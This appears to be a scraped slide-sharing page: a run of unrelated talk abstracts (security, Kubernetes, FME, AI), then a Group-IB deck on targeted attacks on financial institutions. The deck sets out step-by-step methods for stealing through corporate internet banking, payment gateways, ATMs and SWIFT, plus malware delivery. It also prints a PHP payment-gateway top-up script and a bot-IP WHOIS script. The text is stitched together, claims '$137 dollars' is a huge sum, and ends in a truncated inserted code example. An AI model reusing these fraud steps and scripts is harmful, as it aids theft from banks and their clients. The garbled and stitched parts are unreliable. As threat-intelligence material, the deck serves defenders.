The document discusses targeted attacks on financial institutions. It provides information on:
1) Known targeted attackers like Cobalt, Corkow, and Anunak and their favorite targets like ATMs, card processing, and SWIFT systems.
2) Future targeted attackers that may go after financial networks.
3) The common targets of these attacks, which include corporate internet banking software, payment gateways, ATMs, trade terminals, and SWIFT/ARM CBR systems.
4) The malware delivery methods used by these groups, such as driveby downloads, pay-per-install, web hacks, phishing emails, and spear phishing.
Nick Bilogorskiy - Everyday Life in Silicon Valley. The Story of Nick's Career, Fighting Hack... (HackIT Ukraine)
Nick will talk about a typical day of an antivirus specialist in Silicon Valley and about how companies fight hacker attacks. He will tell his story of working at Facebook, how to get hired there, and what experience the company gives you. He will talk about Cyphort and next-generation antivirus, and share new trends in cybersecurity.
Got Domain Administrator Rights? The Game Isn't Over Yet (Positive Hack Days)
Obtaining domain administrator rights does not always mean immediate access to every host, shared resource or database on the network. The trick is to find the right account. The speaker will give examples of various internal penetration testing scenarios, describe the difficulties his team ran into, and explain how they developed a tool that allowed them to overcome those difficulties.
Breaking the cyber kill chain! This slide deck was presented at securITy – information security conference digital world 2017. This talk is about proactive security and threat hunting.
Andrea Lelli, Microsoft
My presentation will trace the end-to-end WannaCrypt (also known as WannaCry) attack. I will start with an analysis of the underlying SMBv1 remote code execution kernel-mode exploit dubbed "Eternalblue", a powerful cyberweapon leaked by a hacker group known as "The Shadow Brokers".
I will then describe how the WannaCrypt ransomware works, and show how the cybercriminals leveraged the EternalBlue exploit to spread the ransomware and achieve a massive and unprecedented infection rate, leaving hundreds of thousands of machines affected. I will highlight the Windows 10 kernel mitigations that granted the OS immunity from the attack.
I will also focus on some interesting characteristics that make WannaCrypt particularly sophisticated, like the file-wiping and space-consuming capabilities designed to make the recovery of the original files nearly impossible.
I will conclude with a look into how much the perpetrators might have likely earned from the attack. An analysis of the Bitcoin transactions shows that the cybercriminals pooled around $137 dollars to date, which is a huge amount of money, but doesn’t seem to scale with the extent of infection. Not to mention, Bitcoin is a double-edged sword and there’s a good chance that the cybercriminals may not be able to cash out a dime. In this section I will also mention some copycat malware that tried to spread using the same SMB vulnerability (e.g. NotPetya).
I will end the presentation with advice on preventing, detecting, and responding to ransomware attacks.
Carlos García - Pentesting Active Directory [rooted2018] (RootedCON)
An introduction to penetration testing in Microsoft Active Directory environments, delivered as a practical talk for auditors or anyone interested in pentesting corporate environments. A brief introduction will be given to the Active Directory directory service and its most critical components from a security standpoint. The main differences from a classic infrastructure pentest will then be explained, along with the most common techniques and attacks used to carry out the engagement and fully compromise the corporate domain. Requirements: attendees are recommended to have basic knowledge of Active Directory and basic/intermediate knowledge of pentesting or ethical hacking, preferably in infrastructure and/or operating systems.
Several attack techniques will be demonstrated, such as code injection, brute force, backdoors, rootkits, exploits and various other ways of gaining and maintaining unauthorized access to servers; in return, best practices for avoiding the types of attacks mentioned are discussed. (Talk given at the 3rd Free Software Festival in Belo Horizonte - FSLBH)
Kymberlee Price and Sam Vaughan, Microsoft
Many developers today are turning to well established third-party open source components and libraries to speed the development process and realize quality improvements over creating an in-house proprietary font parsing or image rendering library from the ground up. Efficiency comes at a cost though: a single OSS component may have multiple additional OSS subcomponents, and an application or service may have dozens of different third party libraries implemented. The result is that third-party and open source libraries have the ability to spread a single vulnerability across multiple products - exposing enterprises and requiring software vendors and IT organizations to patch the same vulnerability repeatedly. This presentation will dive deep into vulnerability data and explore the source and spread of OSS vulnerabilities through products – as well as actions developers, the security research community, and enterprise customers can take to address this problem.
TRITON: The Next Generation of ICS Malware (Thomas Roccia)
This presentation is about the industrial malware dubbed TRITON, which targeted a safety instrumented system in an oil and gas plant in 2017. It was presented during the CNES COMET event about industrial threats.
Saruhan Karademir, Microsoft
David Weston, Microsoft
Windows Defender Application Guard (WDAG) brings the next generation isolation into the browser space. It merges the best of Hyper-V virtualization and Microsoft Edge sandboxing technologies to bring hardware-enforced isolation of untrusted websites from the user’s data and operating system. In this talk, we will walk through the WDAG security promise and architecture. We will explain how it was built from the ground up with security as the number one priority showcasing the architectural decisions that added layers of defense. Finally, we explore how Microsoft’s internal security teams engaged from the very beginning of this feature’s development, helping shape WDAG’s design, finding and fixing critical vulnerabilities, and building additional defense-in-depth layers before the product reached a single customer.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... (CODE BLUE)
In many targeted attack cases, once the attacker gains entry into the network, the malware infection spreads laterally. In incident response, investigating this lateral movement activity is very important. Methods for investigating lateral movement include log analysis of infected hosts and forensic analysis of disk images. However, in many cases, logs useful for incident investigation are not recorded on infected hosts, making it difficult to trace the attackers' behavior. This often results in not being able to get a clear picture of how the infection spread across the network.
Therefore, we investigated attackers' C2 servers and malware to gain insight into their activities. By decoding the malware's communication logs and C2 server logs, we were able to understand the attackers' activity after the network intrusion. We also found common patterns in how the infection spread laterally. Moreover, even in different campaigns with different malware deployed, many common tools were used by the attackers.
Taking advantage of this similarity, we figured that tracking these tools is effective in understanding lateral movement. In Windows PCs, which are the main target of APT attacks, certain
Alexey Starov - How to Conduct Cyber Investigations? (HackIT Ukraine)
"Cybercrime" is a distinct area within computer security and privacy. It brings together research that studies various attack and fraud scenarios, analyzes malicious ecosystems, identifies attackers and examines their methods in order to develop effective countermeasures. This talk will offer recommendations on how to conduct cyber investigations, drawing on examples from our own work and papers. For instance, I will describe our large-scale study of malicious web shells and how we were able to identify victims and attackers around the globe, as well as how we used social engineering skills to investigate the fraudulent technical support ecosystem, and more. My goal is to get academic researchers and other members of the infosec community interested in working in the "Cybercrime" area and in finding different ways to prevent and investigate cybercrime, and also to show that useful research of this kind does not always require enormous resources and collaborations. Talk format: a conversation in the form of a light workshop with elements of group brainstorming (no laptop required). We will go through 3 lessons, drawing useful methods, tools and skills from each. Language: Russian (with elements of English).
International collaborative efforts to share threat data in a vetted member c... (CODE BLUE)
The APWG has been sharing threat data for over 12 years to help protect organizations and all internet users against cyber threats. Initially founded to focus on phishing, APWG has grown as the threat landscape on the internet has grown. Today our vetted member community shares information to fight cybercrime and fraud not only on phishing but on numerous other types of threat data, including malicious IP addresses and ransomware information. This session will look at the history of sharing these types of data, how sharing has changed over the years, and the necessity of automating these processes.
Matt Oh, Microsoft
We are seeing new techniques used every day by malware, but it is very hard to find any truly impressive techniques in the wild. Recently there was a huge buzz about the Detrahere malware, which used internally known issues with certificate signing in Windows 10 kernel drivers. Even though the certificate check bypass technique itself is very interesting, I found the tactics used by the malware even more impressive. Although the malware is mainly focused on ad-hijacking functionality through Netfilter driver installation, it also has rootkit capability through file system driver hooking. This feels like the old days coming back with various new arsenals. The rootkit detects kernel debugging settings and will destroy the system when it finds them. The unpacking process can be a very challenging job, too, as it uses a kernel driver image hollowing technique (something similar to process hollowing) to deobfuscate itself and run the unpacked code. Our PatchGuard doesn't seem to trigger on this action, because all the sections are pre-allocated with execute permission already.
Through this talk, I want to present the various techniques used by this malware, focusing on kernel-level obfuscation and anti-analysis tactics. This will give us new insights into what new Windows rootkit malware might look like in the future and how detecting it in security systems and detonation systems can be a challenge.
Chaz Lever, Georgia Institute of Technology
Both the operational and academic security communities have used dynamic analysis sandboxes to execute malware samples for roughly a decade. Network information derived from dynamic analysis is frequently used for threat detection, network policy, and incident response. Despite these common and important use cases, the efficacy of the network detection signal derived from such analysis has yet to be studied in depth. This paper seeks to address this gap by analyzing the network communications of 26.8 million samples that were collected over a period of five years.
Using several malware and network datasets, our large-scale study makes three core contributions. (1) We show that dynamic analysis traces should be carefully curated and provide a rigorous methodology that analysts can use to remove potential noise from such traces. (2) We show that Internet miscreants are increasingly using potentially unwanted programs (PUPs) that rely on a surprisingly stable DNS and IP infrastructure. This indicates that the security community is in need of better protections against such threats, and network policies may provide a solid foundation for such protections. (3) Finally, we see that, for the vast majority of malware samples, network traffic provides the earliest indicator of infection—several weeks and often months before the malware sample is discovered. Therefore, network defenders should rely on automated malware analysis to extract indicators of compromise and not to build early detection systems.
Matt Nelson, SpecterOps
A persistent "enlightened" attacker will invest the required resources to bypass any and all security features that might stand between them and their objective, regardless of whether these features are guaranteed to be serviced as security boundaries or not. This includes researching and developing attacks against Windows security features that may impose a hurdle in their attack chain. This talk will outline recent research into features such as User Account Control (UAC), the Antimalware Scan Interface (AMSI) and Device Guard, and how these bypasses are useful to attackers in an operational context.
Some examples include:
UAC: If an attacker compromises a user that is running as a split-token administrator, bypassing UAC is required in order to perform any administrative actions; such as dumping credentials from memory.
AMSI: With in-memory attacks becoming more prevalent via scripting languages, AMSI is the next logical step to facilitate detection. An attacker will need to bypass AMSI in order to safely operate in memory when using PowerShell, VBScript, or JScript.
Device Guard: As organizations begin to consider whitelisting solutions, an attacker is required to adapt and develop a bypass to these technologies. One such solution is Device Guard, which can be used to heavily restrict what is allowed to execute on the system. In order to accomplish their objective, an attacker would need to bypass User Mode Code Integrity (UMCI). Such research can find novel ways to execute code in ways that are not likely to be detected.
I will also cover some of the fixes that have been implemented in newer versions of the Windows Operating System. Fixing these bypasses will not only make Windows safer, but it will begin to disrupt attackers by raising the cost associated with successfully executing an attack.
Speaker: Terrence Gareau
The talk describes how to build a honeypot and set up a service with continuously updated data on captured DDoS bots using Kibana, Elasticsearch, Logstash and AMQP. The speaker will open-source the system for monitoring and collecting external DDoS attack statistics that he and his team have been working on for the past two years.
Hacking Exposed LIVE: Attacking in the Shadows (Priyanka Aash)
Attackers have found compromise trivial for decades. But as additional security layers get deployed and next generation solutions come to market, attackers are turning to old and new techniques for bypassing security controls to launch their attacks and stay hidden. This session will explore the latest techniques and how simple defense techniques can foil even the most sophisticated attacks.
(Source: RSA USA 2016-San Francisco)
Over the past few years Eric has shown that telecom fraud is a growing problem, and has presented basic fixes for protecting your (and your customers') PBX. This time he will show the basic configuration considerations that you can take to protect a PBX. Come to this session to find out: Who is out there looking to attack your PBX? How do they find it? How can you protect your PBX?
For organizations and individuals with limited security budgets, successfully hunting for cyber adversaries can be a daunting challenge. Threat intelligence can be expensive and sometimes nothing more than IoCs or blacklists. In this talk, Endgame's threat research team will present a series of techniques that can enable organizations to leverage free or almost-free sources of data and open-source tools to "hunt on the cheap." They'll explain how to: retrieve attackers' tools from globally distributed honeynets that look like your organization or a juicy launching point to attackers; enrich the data past basic file/tool hashes to identify malicious command and control IPs/domains through automated binary analysis using open-source sandboxes and tools; and use passive DNS data to identify active infections and enrich existing data sets. Attendees will learn how to apply these three techniques to hunt for adversaries within their own networks. They will also learn about the various open-source solutions available, such as graph databases, that make these techniques inexpensive and within the scope of many organizations.
Anjum Ahuja, Senior Threat Researcher, Endgame
Jamie Butler, Chief Scientist, Endgame
Andrew Morris, Threat Researcher, Endgame
The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks.
View the full on-demand webcast: https://www2.gotomeeting.com/register/537536362
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Ransomware has become one of the most widespread and damaging threats that internet users face. Since the infamous CryptoLocker first appeared in 2013, we’ve seen a new era of file-encrypting ransomware variants delivered through spam messages and Exploit Kits, extorting money from home users and businesses alike.
Ransomware webinar May 2016 final version external (Zscaler)
In the last few years, ransomware has taken the cybercrime world by storm. CryptoWall 3.0, one of the most lucrative and broad-reaching ransomware campaigns, was alone responsible for 406,887 infection attempts and accounted for about $325 million in damages in 2015. And, according to the Institute for Critical Infrastructure Technology, ransomware promises to wreak more havoc in 2016.
While individual users were once the preferred target of ransomware, perpetrators have increasingly set their sights on businesses and organizations. And you can bet that with larger targets, the ransom demands will increase accordingly.
Are you prepared for such an attack?
In this presentation we will highlight how ransomware can impact your business and why legacy security solutions don't stand a chance against such threats.
This talk revisits the 2016 Mirai attack which targeted IoT devices including IP cameras, WiFi-connected refrigerators, home routers, and more. The resulting botnet was used to attack Dyn’s DNS platform, which affected many websites including Twitter, SoundCloud, Airbnb, and Spotify.
You will learn and discuss the answers to these questions and more:
• What is the current state of Mirai and Mirai variants?
• What Distributed Denial of Service (DDoS) defenses do you have in place?
• How can you prepare to detect and defend against botnet malware?
• What is recommended in the September 2018 NISTIR Draft, Considerations for Managing Internet of Things (IoT) Cybersecurity and Privacy Risks?
Browser isolation (ISC)2 May presentation v2 (Wen-Pai Lu)
Browser isolation protects your devices from malware, phishing and many other web-based attacks. The air gap between your browser and the device you are on keeps all of your browsing activity from affecting the device, thus protecting you from malicious attacks.
Currently I'm working in a company with millions of customers in a very complex and diversified business environment. E-commerce companies like Rakuten Inc. are always under pressure from massive targeted and untargeted attacks on their customers. The different possibilities for monetizing accounts attract fraudsters and increase the level of risk. This is a common problem for today's internet giants.
I want to explain how we have built a large-scale fraud prevention system which can protect customers at different levels of the company ecosystem. Step by step I will explain how you can add additional levels of protection to survive under constant attacks. I want to show how to mitigate some challenges related to reliability and reaction time, and how a combination of different techniques, including machine learning, can improve detection quality.
I want to discuss all these challenges in the context of a huge company with a variety of completely different services for desktop and mobile. I will try to show that it is possible to build a system which effectively protects customers without impacting the conversion rate at the same time.
I also want to cover some aspects of measuring fraud prevention KPIs, and the economic aspects of fraud prevention.
Ransomware: How to avoid a crypto crisis at your IT business (Calyptix Security)
Cryptolocker and other ransomware brought crisis to thousands of businesses last year. The malware made millions by encrypting victims’ files and demanding ransoms to unlock them. Some companies lost everything. Others, including local police departments, had to pay a hefty ransom to recover their data.
Today, Cryptolocker is gone, but ransomware is growing stronger. New variants such as CryptoWall and Critroni are infecting users, locking their files, and demanding higher ransoms. How can you protect your IT business and clients from this growing threat?
Join Calyptix Security for a conversation on crypto-ransomware, where it’s headed, and how to avoid a ‘crypto crisis’ at your office. You’ll get straight-forward advice on how to stop this threat from impacting your business network security and clients.
Video recording of this webinar took place on March 12, 2015
ChangelogBuilder: a tool for automatically preparing Release Notes (Positive Hack Days)
1. Basic concepts and definitions: product, package, and the relationships between them.
2. How do you find out what has changed in a product?
3. Problems with changelogs and release notes.
4. Solution: the ChangelogBuilder tool for automatically preparing Release Notes.
How we build projects in an isolated environment in Windows Docker (Positive Hack Days)
1. Overview of Windows Docker (brief)
2. How we built an application build system in Docker (Visual Studio\Mongo\PostgreSQL\etc.)
3. Dockerfile examples (published on GitHub)
4. Differences between Docker on Windows and Docker on Linux (slow builds, bugs, remote registry)
Standard build and deployment of products at Positive Technologies (Positive Hack Days)
1. Problems in building CI processes in the company
2. Structure of the standard build
3. Example implementation of the standard build
4. Pros and cons of using the standard build
1. What BI is and why it is needed.
2. What Qlik View / Sense is
3. Integration approach. How it works.
4. Metrics, KPIs, team resource planning, product release retrospectives, trends.
5. Connecting external data sources (Excel, access control system database, meeting rooms).
Approof is a static code analyzer that checks web applications for vulnerable components. The analyzer works from rules that store signatures of the components it looks for. The talk covers the basic structure of an Approof rule and how its creation is automated.
Have you ever wondered how modern application protection mechanisms work? What theory lies behind WAF and SAST implementations? What are the limits of their capabilities? How far can those limits be pushed by taking a broader view of application security?
The workshop covers the main methods and algorithms of two fundamental application protection technologies: application-level firewalling and static code analysis. Using specific open-source tools developed especially for this workshop, it examines the problems faced by developers of application protection tools and possible ways to solve them, and answers all of the questions above.
From experimental programming to industrial: a ten-year journey (Positive Hack Days)
Developing research-intensive software is distinctive in that there is neither a clear statement of the problem nor an understanding of what the result will be. Even so, one has to program what is needed, and the way it is needed. The speaker will describe how her team successfully developed and brought into production several research-intensive products, travelling the hard road from an experiment whose result was a prototype to production versions that sell successfully on both the Russian and foreign markets. This road was full of difficulties and sound management decisions, which the speaker will share.
A vulnerable Android application: N proven ways to step on a rake (Positive Hack Days)
Few developers build security into the application architecture at the design stage. Often there is neither money nor time for it. Even fewer understand attacker models and threat models. Protecting the application comes to the fore when vulnerabilities start costing money. By then the application is already running, and making substantial changes to the code becomes a difficult task.
Fortunately, developers are people too, and the same kinds of flaws show up in the code of different applications. The talk covers the dangerous mistakes most often made by Android application developers. It touches on the specifics of the Android OS, gives examples of real applications and their vulnerabilities, and describes how to fix them.
The development of any software is based in one way or another on requirements. The full list consists of the application's business goals, various constraints, and quality expectations (also called NFRs). Software security requirements belong to the last item. The talk covers how these requirements arise, how they are managed, and how the most important ones are selected.
It will also cover the principles of building an application's architecture with and without such requirements, and demonstrate how modern (and well-known) approaches to application design help build an architecture that minimizes the threat landscape.
The talk is devoted to developing correct software using one kind of static code analysis. It covers the application of such methods, their weaknesses and limitations, and the results they can deliver. Specific examples demonstrate what developing specifications for C code and proving that the code conforms to those specifications look like.
Essentials of Automations: Optimizing FME Workflows with Parameters (Safe Software)
Are you looking to streamline your workflows and boost your projects’ efficiency? Do you find yourself searching for ways to add flexibility and control over your FME workflows? If so, you’re in the right place.
Join us for an insightful dive into the world of FME parameters, a critical element in optimizing workflow efficiency. This webinar marks the beginning of our three-part “Essentials of Automation” series. This first webinar is designed to equip you with the knowledge and skills to utilize parameters effectively: enhancing the flexibility, maintainability, and user control of your FME projects.
Here’s what you’ll gain:
- Essentials of FME Parameters: Understand the pivotal role of parameters, including Reader/Writer, Transformer, User, and FME Flow categories. Discover how they are the key to unlocking automation and optimization within your workflows.
- Practical Applications in FME Form: Delve into key user parameter types including choice, connections, and file URLs. Allow users to control how a workflow runs, making your workflows more reusable. Learn to import values and deliver the best user experience for your workflows while enhancing accuracy.
- Optimization Strategies in FME Flow: Explore the creation and strategic deployment of parameters in FME Flow, including the use of deployment and geometry parameters, to maximize workflow efficiency.
- Pro Tips for Success: Gain insights on parameterizing connections and leveraging new features like Conditional Visibility for clarity and simplicity.
We’ll wrap up with a glimpse into future webinars, followed by a Q&A session to address your specific questions surrounding this topic.
Don’t miss this opportunity to elevate your FME expertise and drive your projects to new heights of efficiency.
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do... (UiPath Community)
💥 Speed, accuracy, and scaling – discover the superpowers of GenAI in action with UiPath Document Understanding and Communications Mining™:
See how to accelerate model training and optimize model performance with active learning
Learn about the latest enhancements to out-of-the-box document processing – with little to no training required
Get an exclusive demo of the new family of UiPath LLMs – GenAI models specialized for processing different types of documents and messages
This is a hands-on session specifically designed for automation developers and AI enthusiasts seeking to enhance their knowledge in leveraging the latest intelligent document processing capabilities offered by UiPath.
Speakers:
👨🏫 Andras Palfi, Senior Product Manager, UiPath
👩🏫 Lenka Dulovicova, Product Program Manager, UiPath
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024 (Tobias Schneck)
As AI technology pushes into IT, I was wondering, as an "infrastructure container Kubernetes guy", how does this fancy AI technology get managed from an infrastructure operations point of view? Is it possible to apply our lovely cloud native principles as well? What benefits could both technologies bring to each other?
Let me take these questions and give you a short journey through existing deployment models and use cases for AI software. Using practical examples, we discuss what cloud/on-premise strategy we may need to apply it to our own infrastructure and make it work from an enterprise perspective. I want to give an overview of infrastructure requirements and technologies, and of what could be beneficial or limiting for your AI use cases in an enterprise environment. An interactive demo will give you some insights into which approaches I have already got working for real.
Epistemic Interaction - tuning interfaces to provide information for AI support (Alan Dix)
Paper presented at SYNERGY workshop at AVI 2024, Genoa, Italy. 3rd June 2024
https://alandix.com/academic/papers/synergy2024-epistemic/
As machine learning integrates deeper into human-computer interactions, the concept of epistemic interaction emerges, aiming to refine these interactions to enhance system adaptability. This approach encourages minor, intentional adjustments in user behaviour to enrich the data available for system learning. This paper introduces epistemic interaction within the context of human-system communication, illustrating how deliberate interaction design can improve system understanding and adaptation. Through concrete examples, we demonstrate the potential of epistemic interaction to significantly advance human-computer interaction by leveraging intuitive human communication strategies to inform system design and functionality, offering a novel pathway for enriching user-system engagements.
LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -... (DanBrown980551)
Do you want to learn how to model and simulate an electrical network from scratch in under an hour?
Then welcome to this PowSyBl workshop, hosted by Rte, the French Transmission System Operator (TSO)!
During the webinar, you will discover the PowSyBl ecosystem as well as handle and study an electrical network through an interactive Python notebook.
PowSyBl is an open source project hosted by LF Energy, which offers a comprehensive set of features for electrical grid modelling and simulation. Among other advanced features, PowSyBl provides:
- A fully editable and extendable library for grid component modelling;
- Visualization tools to display your network;
- Grid simulation tools, such as power flows, security analyses (with or without remedial actions) and sensitivity analyses;
The framework is mostly written in Java, with a Python binding so that Python developers can access PowSyBl functionalities as well.
What you will learn during the webinar:
- For beginners: discover PowSyBl's functionalities through a quick general presentation and the notebook, without needing any expert coding skills;
- For advanced developers: master the skills to efficiently apply PowSyBl functionalities to your real-world scenarios.
Key Trends Shaping the Future of Infrastructure.pdf (Cheryl Hung)
Keynote at DIGIT West Expo, Glasgow on 29 May 2024.
Cheryl Hung, ochery.com
Sr Director, Infrastructure Ecosystem, Arm.
The key trends across hardware, cloud and open-source; exploring how these areas are likely to mature and develop over the short and long-term, and then considering how organisations can position themselves to adapt and thrive.
Securing your Kubernetes cluster: a step-by-step guide to success! (KatiaHIMEUR1)
Today, after several years of existence, an extremely active community and an ultra-dynamic ecosystem, Kubernetes has established itself as the de facto standard in container orchestration. Thanks to a wide range of managed services, it has never been so easy to set up a ready-to-use Kubernetes cluster.
However, this ease of use means that the subject of security in Kubernetes is often left for later, or even neglected. This exposes companies to significant risks.
In this talk, I'll show you step-by-step how to secure your Kubernetes cluster for greater peace of mind and reliability.
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality (Inflectra)
In this insightful webinar, Inflectra explores how artificial intelligence (AI) is transforming software development and testing. Discover how AI-powered tools are revolutionizing every stage of the software development lifecycle (SDLC), from design and prototyping to testing, deployment, and monitoring.
Learn about:
• The Future of Testing: How AI is shifting testing towards verification, analysis, and higher-level skills, while reducing repetitive tasks.
• Test Automation: How AI-powered test case generation, optimization, and self-healing tests are making testing more efficient and effective.
• Visual Testing: Explore the emerging capabilities of AI in visual testing and how it's set to revolutionize UI verification.
• Inflectra's AI Solutions: See demonstrations of Inflectra's cutting-edge AI tools like the ChatGPT plugin and Azure Open AI platform, designed to streamline your testing process.
Whether you're a developer, tester, or QA professional, this webinar will give you valuable insights into how AI is shaping the future of software delivery.
Accelerate your Kubernetes clusters with Varnish Caching (Thijs Feryn)
A presentation about the usage and availability of Varnish on Kubernetes. This talk explores the capabilities of Varnish caching and shows how to use the Varnish Helm chart to deploy it to Kubernetes.
This presentation was delivered at K8SUG Singapore. See https://feryn.eu/presentations/accelerate-your-kubernetes-clusters-with-varnish-caching-k8sug-singapore-28-2024 for more details.
4. GROUP-IB.COM
KNOWN TARGETED ATTACKERS
Who are they? What are their favorite targets?
• Buhtrap: ARM CBR (SWIFT analog)
• Cobalt: ATM, card processing, SWIFT
• Corkow: trading terminals, card processing, ATM
• Anunak: internet banking, ARM CBR, SWIFT, payment gateways, card processing, ATM
• Lurk: ARM CBR (SWIFT analog)
5. GROUP-IB.COM
FUTURE TARGETED ATTACKERS
• Toplel
• Ranbyus
• RTM
• Vawtrak
• Dridex
Future Attackers after your network
• Balance is 500 thousand pounds, inter-UK, for money mules (now such money mules now). Skip for now.
• Account for authorization of payments, balance is 2 million pounds
• No function of payment approval. Balance is 18 million pounds. Tried to transfer 2 million to China
• Balance is 15 million pounds, dual authorization off.
• No opportunity to establish sort code for transfer. It is better to ring out
7. GROUP-IB.COM
Targets: Corporate internet banking software
• Compromise operator workstations of corporate accounts
• List companies with high balances
• Generate new digital signatures for each company
• Sign transactions from corporate accounts with the new digital signatures
Access to corporate internet banking enables criminals to steal from TOP clients. Anunak used this method in 2013-2014.
8. GROUP-IB.COM
Targets: Payment gateways
• Once inside, hackers search for payment gateways
• Obtain log files from payment gateways to understand the typical format of communication
• Start SOCKS proxies on internal hosts to enable communication with payment gateways
• Run scripts to replenish the attacker's phone balances in thousands of transactions
• Transfer money from phones to cards and cash out
Payment gateways enable high-frequency, low-amount transfers. Very hard to stop and return the money.
Script shown on the slide (dealer, point and operator ids masked as XXXXXX):

<?php
// Session id derived from the current timestamp
$ses = date("Ymdhis");
$url = "http://ru-demo.cyberplat.com/cgi-bin/DealerSertification/de_pay.cgi";
// Request parameters: dealer/point/operator ids, session, phone number and amount
$data_string = "SD=XXXXXX&AP=XXXXXX&OP=XXXXX&SESSION=".$ses."&COMMENT=Test&NUMBER=9642065662&AMOUNT_ALL=10.0&AMOUNT=10.0";
// Full POST body: the fixed inputmessage prefix followed by the parameters above
$body = "inputmessage=0000038801SM000001270000012700000125&".$data_string;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Content-Length must cover the whole body that is actually posted
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded', 'Content-Length: '.strlen($body)));
curl_setopt($ch, CURLOPT_POSTFIELDS, $body);
$result = curl_exec($ch);
var_dump($result);
9. GROUP-IB.COM
Targets: ATM
• Hackers identify ATM manufacturers
• They detect physical ATM locations
• Upload from the internal network to the ATM
• Jackpot with diagnostic tools
• Jackpot with custom malicious programs for specific ATMs
ATM heists – the easiest way to launder money. Cobalt used malware to withdraw bags of cash totalling $2.6m from 41 ATMs in Taiwan.
10. GROUP-IB.COM
Targets: Trade terminals
• The attack lasted only 14 minutes
• $437 million in purchases (5 trades)
• $97 million sold (2 trades)
• 55 to 66 Rubles — volatility in exchange rate
Corkow conducted the first successful attack on broker terminals in 2015.
12. GROUP-IB.COM
Targets: ARM CBR or SWIFT
• Identify the working directory of the SWIFT or ARM CBR application
• Replace payment details with the fraudster's information
• Intercept confirmation messages to bypass identification of fraudulent transactions
SWIFT
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Alliansmcmin
[ROOT_DRIVE]:\Users\Administrator\AppData\Local\Alliansmcmout
ARM CBR
[ROOT_DRIVE]:uarm3exqinc
[ROOT_DRIVE]:uarm3exqout
13. GROUP-IB.COM
Targets: Card processing
• Legally open bank cards in the same bank or buy new cards on the dark market (usually about 30 cards)
• Remove or increase withdrawal limits
• Remove overdraft limits (even for debit cards)
• Cash out using these cards in other countries
Cobalt, Corkow and Anunak have been conducting these attacks since 2014. It provides very important cash-out benefits.
15. GROUP-IB.COM
Malware Delivery: Driveby
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak
• Corkow
• Buhtrap
• Lurk
800 000+ total visitors per day
11% average exploit success rate
90 000 possible infections per day
16. GROUP-IB.COM
Malware Delivery: Custom pay-per-install
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak
WHAT THEY DID:
• Contact botnet owner
• Ask to provide IPs of infected machines
• Check IP list with script
• Check for records related to financial institutions
• Ask botnet owner to install new trojan
Script shown on the slide (bulk WHOIS lookup of the bot IP list through the Shadowserver service):

#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
from bulkwhois.shadowserver import BulkWhoisShadowserver

# One IP address per line, placed next to the script
iplist_file = 'ip.txt'
path = os.path.dirname(os.path.abspath(__file__))
bulk_whois = BulkWhoisShadowserver()
iplist = []
with open(os.path.join(path, iplist_file)) as f:
    for line in f:
        iplist.append(line.strip())
# Bulk lookup; the result is a dict keyed by IP address
result = bulk_whois.lookup_ips(iplist)
# Append one record per IP (country, organisation, registry, AS, prefix) to data.txt
with open(os.path.join(path, 'data.txt'), 'a') as f:
    for record in result:
        f.write('IP: %s\nCC: %s\nOrg. Name: %s\nRegister: %s\nAS Name: %s\nBGP Prefix: %s\n'
                '-------------------------------------------------------\n'
                % (result[record]['ip'], result[record]['cc'], result[record]['org_name'],
                   result[record]['register'], result[record]['as_name'],
                   result[record]['bgp_prefix']))
17. GROUP-IB.COM
Malware Delivery: Web hack
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak and individual hackers in 2013, 2014, 2015
WHAT THEY DO:
• Identify SQL injection
• Do EXEC in SQL request to gather information about the network environment
• Upload files to the server:
  • with the echo command
  • by downloading from a remote host with Meterpreter
• Upload mimikatz to the Domain Controller
• Create hidden tunnels
18. GROUP-IB.COM
Malware Delivery: Phishing Emails
GROUPS WHICH HAVE USED THIS METHOD:
• Anunak
• Buhtrap
• Lurk
• Cobalt
• MoneyTaker
METHODS TO ENSURE DOCUMENTS ARE OPENED:
• Mass mailing to corporate email addresses
• Calls to bank managers
• Hacking bank clients
• Hacking bank partners
ATTACHMENTS:
• Executables
• Executables in encrypted archive
• Document with exploits
• Document with malicious macros
19. GROUP-IB.COM
Malware Delivery: Spear phishing with faked sender address
ADVANTAGES
• Easy to start
• Unlimited list of brands
• No need to register domains
• Fewer traces for the investigation
• High level of trust from users
• Hard to detect if the email is delivered to the end user
DISADVANTAGES
• Does not pass the Sender Policy Framework (SPF) check
• Low delivery percentage
20. GROUP-IB.COM
Malware Delivery: Spear phishing with faked sender address
ADVANTAGES
• Can bypass the Sender Policy Framework (SPF) check
• New TLDs allow registering very similar domains
• High percentage of delivery
DISADVANTAGES
• Vigilant users can detect it
• Additional traces for investigation
21. GROUP-IB.COM
Malware Delivery: Spear phishing from compromised partner
ADVANTAGES
• Almost 100% delivery with the correct attachment
• High percentage of opening by users from the contact list
• No need to rent a server or register domains
DISADVANTAGES
• Limited by the region where the partner is located
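The two mail-side controls that slides 19 and 20 turn on are (a) the SPF check that a faked sender address fails and (b) a lookalike-domain check for senders that pass SPF because they registered a similar domain under a new TLD. The following is an added example, not Group-IB's code: `CONSTRUCTED_SPF_RECORDS`, the `examplebank.com` domains and the IP addresses are constructed, and `spf_result` is a deliberately simplified evaluator that handles only `ip4`, `ip6` and `all` mechanisms (no `include`/`a`/`mx` expansion), which is an assumption a real gateway would not make.

```python
"""Sender checks for the two spear-phishing variants: SPF evaluation of the
connecting IP and lookalike detection against protected brand domains.
Added example with constructed data; not Group-IB's code."""
import ipaddress
from typing import Dict, List, Optional

# Constructed SPF TXT records standing in for DNS lookups (assumption).
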